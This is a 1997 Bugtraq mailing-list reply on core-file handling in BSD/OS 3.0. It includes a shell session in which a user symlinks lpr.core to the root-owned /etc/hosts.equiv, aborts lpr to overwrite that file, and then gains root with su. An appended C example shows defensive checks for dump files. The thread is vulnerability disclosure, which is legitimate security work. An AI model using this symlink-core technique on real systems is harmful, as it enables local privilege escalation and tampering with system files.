Bugtraq mailing list archives

Re: Core file anomalies under BSDi 3.0


From: ariel () FIREBALL TAU AC IL (Ariel Biener)
Date: Fri, 20 Jun 1997 20:53:16 +0300


On Thu, 19 Jun 1997, Nir Soffer wrote:

[.snip.]
A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
program with privileges isn't necessary.

B.) BSDi _does_ however, check if the file exists, so it's quite
impossible to overwrite files.


Hmm, this is not my experience:

slingshot: {2} % id
uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
slingshot: {3} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
slingshot: {5} % lpr
^Z
Suspended
slingshot: {6} % kill -ABRT %1
slingshot: {7} % fg
lpr
Abort (core dumped)
slingshot: {8} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
slingshot: {9} % su
Password:
Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
slingshot: {1} % uname -a
BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
19:51:22 IDT 1997
root () slingshot tau ac il:/usr/src/sys/compile/SLINGSHOT  i386

It won't work if the target file is *not* mode 0600.

--Ariel


C.) BSDi _does_ change the permissions of the core dump to 600, and it
keeps on being owned by root, so changing the file is impossible as well.

Regards,
Nir.

--
Nir Soffer AKA ScorpioS, scorpios () cs huji ac il .
USER, n.:
        The word computer professionals use when they mean "idiot."
                -- Dave Barry, "Claw Your Way to the Top"


   +---------------------------------------------------------+
   | Ariel Biener                                            |
   | e-mail: ariel () post tau ac il        Work ph: 03-6406086 |
   +---------------------------------------------------------+
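
The transcript above shows the core image being written through a symlink onto a root-owned file. As an added illustration that is not part of the original thread and is not BSD/OS code, this user-space C sketch shows the checks a dump writer needs before writing to a user-controlled path; `open_dump_file`, `selftest` and the file names are hypothetical.

```c
/* Added example, not BSD/OS kernel code: user-space checks before writing a
 * dump to a user-controlled path. Function names are hypothetical. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` to receive a dump for `owner`; returns fd, or -1 on refusal. */
int open_dump_file(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW refuses a symlink as the final component. No O_TRUNC:
     * nothing is modified until the checks below pass. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Check the descriptor, not the path, so the object checked is the one
     * written: regular file, owned by `owner`, no extra hard links. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner ||
        st.st_nlink != 1 || ftruncate(fd, 0) != 0) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario in a private temp directory: a 0600 "victim" file plus
 * a symlink and a hard link to it named like core files. Returns 0 if OK. */
int selftest(void)
{
    char dir[] = "/tmp/dumpdemoXXXXXX";
    struct stat st;
    int fd, bad = 0;
    if (!mkdtemp(dir) || chdir(dir) != 0 ||
        (fd = open("victim", O_WRONLY | O_CREAT | O_EXCL, 0600)) < 0)
        return -1;
    if (write(fd, "secret\n", 7) != 7 || close(fd) != 0 ||
        symlink("victim", "prog.core") != 0 || link("victim", "hard.core") != 0)
        return -1;
    bad |= open_dump_file("prog.core", getuid()) != -1;  /* symlink refused */
    bad |= open_dump_file("hard.core", getuid()) != -1;  /* link count is 2 */
    bad |= stat("victim", &st) != 0 || st.st_size != 7;  /* victim unchanged */
    bad |= (fd = open_dump_file("fresh.core", getuid())) < 0;
    if (fd >= 0) close(fd);
    return bad;
}
int main(void) { return selftest(); }
```

The ownership and link-count checks are made on the open descriptor and truncation happens only afterwards, so a refused target is left byte-for-byte intact.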


